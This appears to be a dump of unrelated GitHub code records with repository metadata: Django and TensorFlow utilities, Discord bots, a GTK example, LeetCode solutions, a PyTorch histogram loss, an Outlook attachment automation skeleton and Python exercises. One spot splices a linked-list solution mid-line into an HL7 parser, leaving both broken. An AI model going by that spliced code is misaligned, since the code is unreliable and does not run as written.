{"seq_id":"36404728559","text":"from django.shortcuts import render\n\n\n# Create your views here.\nfrom shop_about_us.models import AboutUs, OurTeam\n\n\ndef about_us(request):\n    abouts_us = AboutUs.objects.all()\n    our_team = OurTeam.objects.all()\n    context = {\n        \"about_us\": abouts_us,\n        \"our_team\": our_team\n    }\n    return render(request, \"about_us/about_us.html\", context)\n","repo_name":"Alibehzad79/OnlineShop_with_Django","sub_path":"shop_about_us/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"}
{"seq_id":"71856076920","text":"# -*-coding:utf-8 -*-\n\"\"\"\n    Commonly used training op combinations\n\"\"\"\nimport tensorflow.compat.v1 as tf\nfrom itertools import chain\n\ndef lr_decay(init_lr, step_per_epoch, decay_rate):\n    global_step = 
tf.train.get_or_create_global_step()\n\n    lr = tf.train.exponential_decay(\n        init_lr,\n        global_step,\n        step_per_epoch,\n        staircase=True,\n        decay_rate=decay_rate)\n\n    tf.summary.scalar('lr', lr)\n    return lr\n\n\ndef gradient_clipping(optimizer, cost, lower_clip, upper_clip):\n    \"\"\"\n    apply gradient clipping\n    \"\"\"\n    gradients, variables = zip(*optimizer.compute_gradients( cost ))\n\n    clip_grad = [tf.clip_by_value( grad, lower_clip, upper_clip) for grad in gradients if grad is not None]\n\n    train_op = optimizer.apply_gradients(zip(clip_grad, variables),\n                                         global_step=tf.train.get_global_step() )\n\n    return train_op\n\n\ndef train_op_clip_decay(loss, init_lr, steps_per_epoch, decay_rate, lower_clip, upper_clip):\n    \"\"\"\n    Adam optimizer with exponential lr decay and gradient clip\n    \"\"\"\n    lr = lr_decay(init_lr, steps_per_epoch, decay_rate)\n\n    opt = tf.train.AdamOptimizer(lr)\n\n    train_op = gradient_clipping(opt, loss, lower_clip, upper_clip)\n\n    return train_op\n\n\ndef train_op_diff_lr(loss, init_lr, diff_lr_times, optimizer, tvars=None):\n    \"\"\"\n    For finetune, use different learning rate schema for different layer\n    diff_lr_times: {'scope': times}\n    \"\"\"\n\n    global_step = tf.train.get_or_create_global_step()\n\n    if not tvars:\n        tvars = tf.trainable_variables()\n\n    opt_list = []\n    var_list = []\n    # lr/opt for other layers\n    for name, times in diff_lr_times.items():\n        opt = optimizer(init_lr * times)\n        opt_list.append(opt)\n        var_list.append([i for i in tvars if name in i.name])\n\n    # any variables left uncovered by diff_lr_times fall back to the plain init lr\n    vars = [i for i in tvars if i not in list(chain(*var_list))]\n    if vars:\n        opt = optimizer(init_lr)\n        opt_list.append(opt)\n        var_list.append(vars)\n\n    # calculate gradient for all vars and clip gradient\n    all_grads = tf.gradients(loss, list(chain(*var_list)))\n    (all_grads, _) = tf.clip_by_global_norm(all_grads, clip_norm=1.0)\n\n    # back propagate given different learning rate\n    train_op_list = []\n    for vars, opt in zip(var_list, opt_list):\n        num_vars = len(vars)\n        grads = all_grads[:num_vars]\n        all_grads = all_grads[num_vars:]\n        train_op = opt.apply_gradients(zip(grads, vars)) # global_step is advanced once by the assign below\n        train_op_list.append(train_op)\n    train_op = tf.group(train_op_list, [global_step.assign(global_step + 1)])\n\n    return train_op\n\n\n","repo_name":"DSXiangLi/SimpleClassification","sub_path":"tools/opt_utils.py","file_name":"opt_utils.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"}
{"seq_id":"3686099786","text":"import discord\nimport sys\nfrom discord.ext import commands\n\nfrom config import Bot\n\n\nasync def modup(ctx):\n    return ctx.channel.permissions_for(ctx.message.author).manage_messages\n\n\nclass General:\n    \"\"\"General Management Commands.\"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @staticmethod\n    def is_owner(ctx):\n        return ctx.message.author.id == Bot.OWNER_ID\n\n    @commands.command(no_pm=True)\n    async def info(self, ctx):\n        \"\"\"Shows bot info\"\"\"\n        embed_info = discord.Embed(\n            color=0x1abc9c\n        ).set_author(name=str(ctx.bot.user), icon_url=ctx.bot.user.avatar_url) \\\n            .add_field(name=\"Creator\", value=Bot.OWNER_NAME) \\\n            .add_field(name=\"Version\", value=Bot.VERSION) \\\n            .add_field(name=\"Discord Library Version\", value=discord.__version__) \\\n            .add_field(name=\"Libraries Used\", value=\"\\n\".join(sys.modules.keys()))\n        await ctx.message.channel.send(embed=embed_info)\n\n    @commands.command(no_pm=True)\n    async def ping(self, 
ctx):\n        \"\"\"Shows bot's latency\"\"\"\n        await ctx.send(str(int(self.bot.latency*1000))+\"ms\")\n\n    @commands.command(no_pm=True)\n    @commands.has_permissions(manage_guild=True)\n    async def purge(self, ctx, *, limit: int):\n        \"\"\" Purge x messages (not including this command)\"\"\"\n        if limit < 100:\n            await ctx.message.channel.purge(limit=limit, before=ctx.message)\n\n    @commands.command(no_pm=True)\n    async def serverinfo(self, ctx):\n        \"\"\"General info about the server.\"\"\"\n        embed = discord.Embed()\n        guild = ctx.message.guild\n        embed.set_author(name=str(guild), icon_url=guild.icon_url)\n        embed.add_field(name=\"Owner:\", value=str(guild.owner))\n        embed.add_field(name=\"Created at:\", value=str(guild.created_at.strftime(\"%d-%m-%Y at %H:%M\")))\n        embed.add_field(name=\"Member Count:\", value=str(guild.member_count))\n        embed.add_field(name=\"Role Count:\", value=str(len(guild.roles)))\n        embed.add_field(name=\"Channel Count:\", value=str(len(guild.channels)))\n        embed.add_field(name=\"TextChannel Count:\", value=str(len(guild.text_channels)))\n        embed.add_field(name=\"VoiceChannel Count:\", value=str(len(guild.voice_channels)))\n        embed.add_field(name=\"Category Count:\", value=str(len(guild.categories)))\n        await ctx.message.channel.send(embed=embed)\n\n    @commands.command(no_pm=True)\n    @commands.check(is_owner)\n    async def shutdown(self, ctx):\n        \"\"\"Simple shutdown command\"\"\"\n        await ctx.bot.logout()\n        exit()\n\n\ndef setup(bot):\n    bot.add_cog(General(bot))\n","repo_name":"dondish/Soko","sub_path":"cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"71055664761","text":"'''\n    ***************************************************************************** \n    * PURPOSE\n    * Example of use of the Stack Container\n    ***************************************************************************** \n    * MODIFICATIONS\n    * @author JL Sowers 04 MAY 2023\n    ***************************************************************************** \n    * DESIGN NOTES:\n    * Also shows use of StackSwitcher, Button\n    * Incidental use of GTKWindow, GTKCalendar, GTKTextView and GTKLabel as \n    * placeholders (no interactive use)\n    ***************************************************************************** \n'''\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk as gtk\n\nclass StackTest():\n    \n    def __init__(self):\n        self.gladefile = \"StackTest.glade\"\n        builder = gtk.Builder()\n        builder.add_from_file(self.gladefile)\n        self.topLevel = builder.get_object('toplevel')\n\n        # No real code here, the stack is handled and setup in Glade\n        # Note the Stack Labels are set in Glade under the Packing tab for each of the contents of the stack. 
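\n        # The StackSwitcher is wired to the Stack in Glade as well, so no Python code is needed to switch pages.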
\n \n # Set up the button bar\n self.quitBtn = builder.get_object(\"quitBtn\")\n self.quitBtn.connect('clicked', lambda w: self.bye_bye()) \n \n # Let'r rip!\n self.topLevel.show_all()\n \n \n def bye_bye(self):\n gtk.main_quit() \n\nif __name__ == '__main__':\n StackTest()\n gtk.main() \n","repo_name":"jsowers34/PythonGladeExamples","sub_path":"StackTest.py","file_name":"StackTest.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41853982614","text":"from django.contrib.auth.models import User\nfrom conektango.models import Customer\n\n\ndef global_ctx(request):\n \"\"\"\n CTX gobal\n :param request: User request\n :return: ctx global\n \"\"\"\n try:\n customer = Customer.objects.filter(user=request.user).first()\n except:\n customer = None\n ctx = {\n 'conekta_user': customer,\n }\n return ctx\n\n\n\n","repo_name":"kiubtech/conektango-demo","sub_path":"conektango-demo/context_processor.py","file_name":"context_processor.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24714943449","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n# create two dummy nodes for two parts of the answer before and after\n before=before_head=ListNode(0,None)\n after=after_head=ListNode(0,None)\n# Iterate over the given list while adding the node=x to after list\n while head:\n if head.val index:\n num = keyparts[index]\n if num[0].upper() == prefix:\n num = num[1:]\n return int(num)\n else:\n return None\n\n parts = key.split(\".\")\n segment = parts[0][:3]\n if len(parts[0]) > 3:\n segment_num = int(parts[0][3:])\n else:\n segment_num = 1\n field_num = parse_part(parts, 1, \"F\")\n repeat_num = parse_part(parts, 2, \"R\")\n component_num = parse_part(parts, 3, \"C\")\n subcomponent_num = parse_part(parts, 4, \"S\")\n return cls(\n segment, segment_num, field_num, repeat_num, component_num, subcomponent_num\n )\n","repo_name":"johnpaulett/python-hl7","sub_path":"hl7/accessor.py","file_name":"accessor.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":264,"dataset":"github-code","pt":"40"} +{"seq_id":"9880726001","text":"from typing import Optional\n\n\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n nodemap = {}\n\n def deepcopy(n: Node) -> Node:\n if not n:\n return n\n\n nonlocal nodemap\n if n in nodemap:\n return nodemap[n]\n\n nn = Node(x=n.val)\n nodemap[n] = nn\n nn.next = deepcopy(n.next)\n nn.random = deepcopy(n.random)\n return nn\n\n return deepcopy(head)\n\n\nif __name__ == '__main__':\n\n Solution().copyRandomList(Node(1, next=Node(2, next=Node(3))))","repo_name":"shadowofs/algo","sub_path":"138.py","file_name":"138.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20382480624","text":"#\n# @lc app=leetcode id=1695 lang=python3\n#\n# [1695] Maximum Erasure Value\n#\n\n# @lc code=start\n\nfrom typing import List\n\nclass Solution:\n def 
maximumUniqueSubarray(self, nums: List[int]) -> int:\n        n = len(nums)\n        prefix = [0] * n\n        prefix[0] = nums[0]\n        for i in range(1, n):\n            prefix[i] = prefix[i - 1] + nums[i]\n        prefix.append(0)\n        mydict = {}\n        j = -1\n        ans = 0\n        for i in range(n):\n            if nums[i] not in mydict:\n                mydict[nums[i]] = i\n                a = prefix[i]\n                b = prefix[j]\n                ans = max(ans, a - b)\n            else:\n                a = prefix[i]\n                j = max(j, mydict[nums[i]])\n                b = prefix[j]\n                mydict[nums[i]] = i\n                ans = max(ans, a - b)\n        return ans\n\n\nnums = [4,2,4,5,6]\nnums = [5,2,1,2,5,2,1,2,5]\ns = Solution()\nprint(s.maximumUniqueSubarray(nums))\n\n \n# @lc code=end\n\n","repo_name":"caitaozhan/LeetCode","sub_path":"array/1695.maximum-erasure-value.py","file_name":"1695.maximum-erasure-value.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"}
{"seq_id":"72770800121","text":"import datetime\n\n\ndef greeting():\n    \"\"\"\n    Print a greeting that matches the current time of day.\n    \"\"\"\n    todaydetail = datetime.datetime.today()\n    if 4 <= todaydetail.hour <= 10:\n        print(\"おはようございます\")\n    elif 11 <= todaydetail.hour <= 17:\n        print(\"こんにちは\")\n    else:\n        print(\"こんばんは\")\n\n\nif __name__ == '__main__':\n    greeting()","repo_name":"yukishinonome/NLP","sub_path":"greeting.py","file_name":"greeting.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
{"seq_id":"6148447930","text":"import numpy as np\n\n\n#%%\ndef preprocess_E(E_in):\n    '''\n    returns : renaming of edges in E so that every edge is unique. \n    vertex equivalence classes\n    permutation to sort edges by second vertex\n    permutation to undo above sort\n    '''\n    E = np.copy(E_in)\n    E = np.sort(E,axis=1) # edges always have lower vertex first\n    E = E[np.argsort(10000*E[:,0]+E[:,1])] # now sort edges to help find duplicates\n    \n    V = np.unique(E)\n    supernodes = np.array([set([v]) for v in V])\n    supernode_nonempty_Q = np.ones(len(V),dtype='bool')\n\n    v = np.max(V)+1\n    \n    i = 0\n    e = [-1,-1]\n    while i < len(E):\n        e_ = e\n        e = E[i]\n        if np.all(e == e_): \n            # add new vertex to equivalence classes\n            for j in range(len(V)):\n                if e[1] in supernodes[j]:\n                    supernodes[j] = supernodes[j] | {v}\n\n            e = E[i-1]\n            E[i,1] = v\n            v += 1\n        i += 1\n    \n    print('construct G')\n    G = -1*np.ones((v+1,v+1),dtype='int')\n    for k in range(np.shape(E)[0]):\n        e0,e1 = E[k]\n        G[e0,e1] = k\n        G[e1,e0] = k\n    \n    print(\"number of duplicate edges:\", v - np.max(V) - 1)\n\n    return E,G,supernodes,supernode_nonempty_Q\n\n#%%\n \nfor i in [0,1,2,3]:\n    E_raw = np.loadtxt('b'+str(i)+'.in',dtype='int')\n    E,G,supernodes,supernode_nonempty_Q = preprocess_E(E_raw)\n    np.savez('b'+str(i)+'_pre',E=E,G=G,supernodes=supernodes,supernode_nonempty_Q=supernode_nonempty_Q)\n\n#%%\ndef preprocess1_E(E_in):\n    '''\n    returns : renaming of edges in E so that every edge is unique. 
\n vertex equivalence classes\n permutation to sort edges by second vertex\n permutation to undo above sort\n '''\n print('construct E')\n E_ = np.copy(E_in)\n E_ = np.sort(E_,axis=1) # edges always have lower vertex first\n E_int = 10000*E_[:,0]+E_[:,1] # now sort edges to help find duplicates\n \n E_int_unique,index,edge_counts = np.unique(E_int,return_index=True,return_counts=True) \n \n E = E_[index]\n \n print('construct V')\n V = np.unique(E)\n minV = np.min(V)\n \n V -= minV\n E -= minV\n \n size_V = len(V)\n supernodes = np.array([set([v]) for v in V])\n supernode_nonempty_Q = np.ones(size_V,dtype='bool')\n \n print('construct G')\n G = -1*np.ones((np.max(V)+1,np.max(V)+1),dtype='int')\n for k in range(len(E)):\n e0,e1 = E[k]\n G[e0,e1] = k\n G[e1,e0] = k\n \n return E,G,edge_counts,supernodes,supernode_nonempty_Q\n\n#%% Preprocess Data\n\nfor i in [0,1,2,3]:\n E_raw = np.loadtxt('b'+str(i)+'.in',dtype='int')\n E,G,edge_counts,supernodes,supernode_nonempty_Q = preprocess1_E(E_raw)\n # np.savez('b'+str(i)+'_pre1',E=E,G=G,edge_counts=edge_counts,supernodes=supernodes,supernode_nonempty_Q=supernode_nonempty_Q)\n np.savetxt('b'+str(i)+'_min_cut_size.dat',[len(G)],fmt='%d')\n","repo_name":"interesting-courses/UW_coursework","sub_path":"cse521/hw1/p1_data/old/p1_preprocess.py","file_name":"p1_preprocess.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"36049444123","text":"from spider_template import GGVenturesSpider\n\n\nclass Usa0010Spider(GGVenturesSpider):\n name = 'usa_0010'\n start_urls = [\"https://www.bradley.edu/academic/colleges/fcba/\"]\n country = 'US'\n # eventbrite_id = 6221361805\n\n # handle_httpstatus_list = [301,302,403,404]\n\n static_name = \"Bradley University, Foster College of Business Administration\"\n \n static_logo = \"https://www.bradley.edu/asset/img/logo_v2.svg\"\n\n # MAIN EVENTS LIST PAGE\n parse_code_link = \"https://www.bradley.edu/calendar/\"\n\n university_contact_info_xpath = \"//body\"\n # contact_info_text = True\n contact_info_textContent = True\n # contact_info_multispan = True\n # TRANSLATE = True\n\n def parse_code(self,response):\n try:\n ####################\n self.driver.get(response.url)\n \n # self.check_website_changed(upcoming_events_xpath=\"//p[text()='No events are currently published.']\",empty_text=False)\n \n # self.ClickMore(click_xpath=\"//a[text()='View more events...']\",run_script=True)\n \n # for link in self.multi_event_pages(num_of_pages=8,event_links_xpath=\"//div[@class='em-card_image']/a\",next_page_xpath=\"(//div[@class='em-search-pagination']//i)[2]/..\",get_next_month=False,click_next_month=True,wait_after_loading=True,run_script=True):\n for link in self.events_list(event_links_xpath=\"//h3/a\"):\n self.getter.get(link)\n if self.unique_event_checker(url_substring=[\"https://www.bradley.edu/calendar/\"]):\n \n self.Func.print_log(f\"Currently scraping --> {self.getter.current_url}\",\"info\")\n\n item_data = self.item_data_empty.copy()\n \n item_data['event_link'] = link\n\n item_data['event_name'] = self.scrape_xpath(xpath_list=[\"//h2\"])\n item_data['event_desc'] = self.scrape_xpath(xpath_list=[\"//div[@class='col-md-7']\"],enable_desc_image=True)\n item_data['event_date'] = self.scrape_xpath(xpath_list=[\"//div[starts-with(@class,'row-color-bWhite')]//i[contains(@class,'calendar')]/..\"],method='attr')\n item_data['event_time'] = 
self.scrape_xpath(xpath_list=[\"//div[starts-with(@class,'row-color-bWhite')]//i[contains(@class,'clock')]/..\"],method='attr',error_when_none=False)\n item_data['startups_contact_info'] = self.scrape_xpath(xpath_list=[\"//dt[text()='Contact']/..\"],method='attr',error_when_none=False)\n\n yield self.load_item(item_data=item_data,item_selector=link)\n\n ####################\n except Exception as e:\n self.exception_handler(e)\n","repo_name":"kingcobra1325/ggventures-bot","sub_path":"ggventures/spiders/usa_0010.py","file_name":"usa_0010.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22436957450","text":"# ----------------------------------------------------------------------------\n# Name: openAttachment.py\n# Description: python script skeleton, to open email attachment.\n# Author: Spencer Brown\n# URL: https://github.com/spence-rat/pywin-auto-open-email-attachment\n# Date: 01/14/2022\n# ----------------------------------------------------------------------------\n\nfrom pywinauto import Application, Desktop\nimport time\n#starts the application you are wanting to automate\nstart_program = \"\"\n\napp = Application(backend=\"uia\").start(start_program)\n#example\napp = Application(backend=\"uia\").start(r'C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK')\n##gives time for application to fully load before windows are available to pywinauto##\ntime.sleep(10)\n\n#----------------------------define your application main dialog window--------\n##could be possible to use regex here -> app.window(title_re=\"*-Outlook\")\n#you can see what windows are available to you throughout this process by running:\n#print app.windows()\nmain_dlg = app[name_of_window]\n#example: main_dlg = app['Inbox - Spencer.Brown@sophos.com - Outlook']\n#From here, you will need to find the 'control identifiers' or the 'handle' on the window in question\n#to do this call the print_control_identifiers method \n#example: main_dlg.print_control_identifiers()\n#example: main_dlg.print_control_identifiers(filename=\"path_to_file\"), to output into a log file. 
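\n#Tip: in recent pywinauto versions, main_dlg.dump_tree() is an alias for print_control_identifiers().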
\n#-----------------------------Identify a particular email----------------------\nemail = main_dlg.child_window(control_identifier_of_element)\n#example = main_dlg.child_window(title=\"title\", auto_id=\"4306\", control_type=\"Pane\")\n#example = main_dlg['identifier']\n#click to open new email window\nemail.click_input(double=True)\ntime.sleep(10)\n#-----------------------------Reference the new open window--------------------\n#to identify all windows, including the newly opened one, run print(app.windows())\nopen_dlg = app['name_of_newly_opened_window']\n#-----------------------------Define the attachments part of the open email\n#run attachments.print_control_identifiers() to see available controls\n#if several controls share the same name, you can call the unique handle generated by pywinauto\n#in this case it was 'Button1' to open the attachment\nattachments = open_dlg.child_window('control_identifier_on_email_for_the_attachment')\n#or attachments[control_identifier].method()\n#double click the attachment\nattachments.Button1.click_input(double=True)\n","repo_name":"ralph-brynard/pywinauto-open-email-attachment","sub_path":"open-attachment.py","file_name":"open-attachment.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"70684346679","text":"\"\"\"You’re given a read only array of n integers. Find out if any integer occurs more than n/3 times in the array in linear time and constant additional space.\n\nIf so, return the integer. If not, return -1.\n\nIf there are multiple solutions, return any one.\n\nExample :\n\nInput : [1 2 3 1 1]\nOutput : 1 \n1 occurs 3 times which is more than 5/3 times.\n\nreference : http://stackoverflow.com/questions/2600191/how-can-i-count-the-occurrences-of-a-list-item-in-python \"\"\"\n\nfrom collections import Counter\nclass Solution:\n    # @param A : tuple of integers\n    # @return an integer\n    def repeatedNumber(self, A):\n        A = list(A)\n        B= Counter(A).most_common()\n        for i in xrange(len(B)):\n            if(B[i][1] > len(A)/3):\n                result = B[i][0]\n                return result\n        return -1\n","repo_name":"M4573R/Interviewbit2","sub_path":"Repeat3.py","file_name":"Repeat3.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"15893319940","text":"import torch\n\nfrom numpy.testing import assert_almost_equal\n\nclass HistogramLoss(torch.nn.Module):\n    def __init__(self, num_steps, cuda=True):\n        super(HistogramLoss, self).__init__()\n        self.step = 2 / (num_steps - 1)\n        self.eps = 1 / num_steps\n        self.cuda = cuda\n        self.t = torch.arange(-1, 1+self.step, self.step).view(-1, 1)\n        self.tsize = self.t.size()[0]\n        if self.cuda:\n            self.t = self.t.cuda()\n    \n    def forward(self, features, classes):\n        def histogram(inds, size):\n            s_repeat_ = s_repeat.clone()\n            indsa = (s_repeat_floor - (self.t - self.step) > -self.eps) & (s_repeat_floor - (self.t - self.step) < self.eps) & inds\n            assert indsa.nonzero().size()[0] == size, ('Another number of bins should be used')\n            zeros = torch.zeros((1, indsa.size()[1])).byte()\n            if self.cuda:\n                zeros = zeros.cuda()\n            indsb = torch.cat((indsa, zeros))[1:, :]\n            s_repeat_[~(indsb|indsa)] = 0\n            # indsa corresponds to the first condition of the second equation of the paper\n            s_repeat_[indsa] = (s_repeat_ - self.t + self.step)[indsa] / self.step\n            # indsb corresponds to the second condition of the second equation of the paper\n            s_repeat_[indsb] = (-s_repeat_ 
+ self.t + self.step)[indsb] / self.step\n\n return s_repeat_.sum(1) / size\n \n classes_size = classes.size()[0]\n classes_eq = (classes.repeat(classes_size, 1) == classes.view(-1, 1).repeat(1, classes_size)).data\n dists = torch.mm(features, features.transpose(0, 1))\n assert ((dists > 1 + self.eps).sum().item() + (dists < -1 - self.eps).sum().item()) == 0, 'L2 normalization should be used'\n s_inds = torch.triu(torch.ones(classes_eq.size()), 1).byte()\n if self.cuda:\n s_inds= s_inds.cuda()\n pos_inds = classes_eq[s_inds].repeat(self.tsize, 1)\n neg_inds = ~classes_eq[s_inds].repeat(self.tsize, 1)\n pos_size = classes_eq[s_inds].sum().item()\n neg_size = (~classes_eq[s_inds]).sum().item()\n s = dists[s_inds].view(1, -1)\n s_repeat = s.repeat(self.tsize, 1)\n s_repeat_floor = (torch.floor(s_repeat.data / self.step) * self.step).float()\n \n histogram_pos = histogram(pos_inds, pos_size)\n assert_almost_equal(histogram_pos.sum().item(), 1, decimal=1, \n err_msg='Not good positive histogram', verbose=True)\n histogram_neg = histogram(neg_inds, neg_size)\n assert_almost_equal(histogram_neg.sum().item(), 1, decimal=1, \n err_msg='Not good negative histogram', verbose=True)\n histogram_pos_repeat = histogram_pos.view(-1, 1).repeat(1, histogram_pos.size()[0])\n histogram_pos_inds = torch.tril(torch.ones(histogram_pos_repeat.size()), -1).byte()\n if self.cuda:\n histogram_pos_inds = histogram_pos_inds.cuda()\n histogram_pos_repeat[histogram_pos_inds] = 0\n histogram_pos_cdf = histogram_pos_repeat.sum(0)\n loss = torch.sum(histogram_neg * histogram_pos_cdf)\n \n return loss\n \n","repo_name":"valerystrizh/pytorch-histogram-loss","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"40"} +{"seq_id":"73162388920","text":"from bot_logger import logger\nfrom cogs.modules.alert_functionality import AlertFunctionality\nfrom cogs.modules.coin_market_functionality import CoinMarketFunctionality\nfrom cogs.modules.coin_market import CoinMarket\nfrom cogs.modules.subscriber_functionality import SubscriberFunctionality\nimport asyncio\nimport datetime\nimport json\nimport re\n\n\nclass CoreFunctionalityException(Exception):\n \"\"\"Handles core related errors\"\"\"\n\n\nclass CoreFunctionality:\n \"\"\"Handles Core functionality\"\"\"\n\n def __init__(self, bot):\n with open('config.json') as config:\n self.config_data = json.load(config)\n self.bot = bot\n self.started = False\n self.market_list = None\n self.market_stats = None\n self.acronym_list = None\n self.coin_market = CoinMarket()\n self.cmc = CoinMarketFunctionality(bot, self.coin_market)\n self.alert = AlertFunctionality(bot,\n self.coin_market,\n self.config_data[\"alert_capacity\"])\n self.subscriber = SubscriberFunctionality(bot,\n self.coin_market,\n self.config_data[\"subscriber_capacity\"])\n self.bot.loop.create_task(self._continuous_updates())\n\n async def _update_data(self, minute=0):\n try:\n await self._update_market()\n self._load_acronyms()\n self.cmc.update(self.market_list,\n self.acronym_list,\n self.market_stats)\n self.alert.update(self.market_list, self.acronym_list)\n self.subscriber.update(self.market_list, self.acronym_list)\n await self.subscriber.update_game_status()\n await self.alert.alert_user()\n if self.started:\n await self.subscriber.display_live_data(minute)\n except Exception as e:\n print(\"Failed to update data. 
See error.log.\")\n logger.error(\"Exception: {}\".format(str(e)))\n\n async def _continuous_updates(self):\n await self._update_data()\n self.started = True\n print('CoinMarketDiscordBot is online.')\n logger.info('Bot is online.')\n while True:\n time = datetime.datetime.now()\n if time.minute % 5 == 0:\n await self._update_data(time.minute)\n await asyncio.sleep(60)\n else:\n await asyncio.sleep(20)\n\n async def _update_market(self):\n \"\"\"\n Loads all the cryptocurrencies that exist in the market\n\n @return - list of crypto-currencies\n \"\"\"\n try:\n retry_count = 0\n market_stats = self.coin_market.fetch_coinmarket_stats()\n currency_data = self.coin_market.fetch_currency_data(load_all=True)\n while market_stats is None or currency_data is None:\n if retry_count >= 10:\n msg = (\"Max retry attempts reached. Please make \"\n \"sure you're able to access coinmarketcap \"\n \"through their website, check if the coinmarketapi \"\n \"is down, and check if \"\n \"anything is blocking you from requesting \"\n \"data.\")\n raise CoreFunctionalityException(msg)\n logger.warning(\"Retrying to get data..\")\n if market_stats is None:\n market_stats = self.coin_market.fetch_coinmarket_stats()\n if currency_data is None:\n currency_data = self.coin_market.fetch_currency_data(load_all=True)\n retry_count += 1\n await asyncio.sleep(5)\n market_dict = {}\n for currency in currency_data:\n market_dict[currency['id']] = currency\n self.market_stats = market_stats\n self.market_list = market_dict\n except CoreFunctionalityException as e:\n logger.error(str(e))\n except Exception as e:\n print(\"Failed to update market. See error.log.\")\n logger.error(\"Exception: {}\".format(str(e)))\n\n def _load_acronyms(self):\n \"\"\"\n Loads all acronyms of existing crypto-coins out there\n\n @return - list of crypto-acronyms\n \"\"\"\n try:\n if self.market_list is None:\n raise Exception(\"Market list was not loaded.\")\n acronym_list = {}\n duplicate_count = 0\n for currency, data in self.market_list.items():\n if data['symbol'] in acronym_list:\n duplicate_count += 1\n if data['symbol'] not in acronym_list[data['symbol']]:\n acronym_list[data['symbol'] + str(1)] = acronym_list[data['symbol']]\n acronym_list[data['symbol']] = (\"Duplicate acronyms \"\n \"found. Possible \"\n \"searches are:\\n\"\n \"{}1 ({})\\n\".format(data['symbol'],\n acronym_list[data['symbol']]))\n dupe_acronym = re.search('\\\\d+', acronym_list[data['symbol']])\n dupe_num = str(int(dupe_acronym.group(len(dupe_acronym.group()) - 1)) + 1)\n dupe_key = data['symbol'] + dupe_num\n acronym_list[dupe_key] = currency\n acronym_list[data['symbol']] = (acronym_list[data['symbol']]\n + \"{} ({})\".format(dupe_key,\n currency))\n else:\n acronym_list[data['symbol']] = currency\n self.acronym_list = acronym_list\n except Exception as e:\n print(\"Failed to load cryptocurrency acronyms. See error.log.\")\n logger.error(\"Exception: {}\".format(str(e)))\n","repo_name":"fobpatrol/autopumpbot","sub_path":"cogs/modules/core_functionality.py","file_name":"core_functionality.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33163499230","text":"# While Loops\n# while condition:\n# run the code as long as condition is satisfied\nhealth = 5\n\nwhile health > 0:\n print(f\"Still fighting..! 
Health: {health}\")\n\n health = health - 1\nprint(\"You are dead now.\")\n\n# Exercise\n# 0: (5 points - each)\n# Make a variable called strength, and set its initial value to 5.\n# Print a message reporting the player's strength.\n# Set up a while loop that runs until the player's strength increases to a value such as 10.\n# Inside the while loop, print a message that reports the player's current strength.\n# Inside the while loop, write a statement that increases the player's strength.\n# Outside the while loop, print a message reporting that the player has grown too strong, and that they have moved up to a new level of the game.\n# Bonus: Play around with different cutoff levels for the value of strength, and play around with different ways to increase the strength value within the while loop.\nstrength = 5\nprint(f\"Strength: {strength}\")\nwhile strength < 10:\n print(f\"Strength: {strength}\")\n strength = strength + 1\nprint(\"You have grown too strong!\")\nprint(\"You have moved up to a new level of the game.\")\n\n\n# INPUT TAKING\n# variable = input('Message')\n# it takes a str\nnames = [\"bedir\"]\nanother_name = input(\"A name I should know: \")\nnames.append(another_name)\n\nprint(names)\n\n# Exercise 1:\n# 0:\n# Make a list that includes 3 or 4 games that you like to play.\n# Print a statement that tells the user what games you like.\n# Ask the user to tell you a game they like, and store the game in a variable such as new_game.\n# Add the user's game to your list.\n# Print a new statement that lists all of the games that we like to play (we means you and your user).\ngames = [\"csgo\", \"dota 2\", \"league (awful)\", \"sims4\"]\nfor game in games:\n print(game)\nnew_game = input(\"A game you like: \")\ngames.append(new_game)\nfor game in games:\n print(game)\n\n# While loops - keep it running\nnew_name = \"\"\nnames = []\nwhile new_name != \"quit\":\n new_name = input(\"Give me a name (type quit if you want to stop): \")\n if new_name != \"quit\":\n 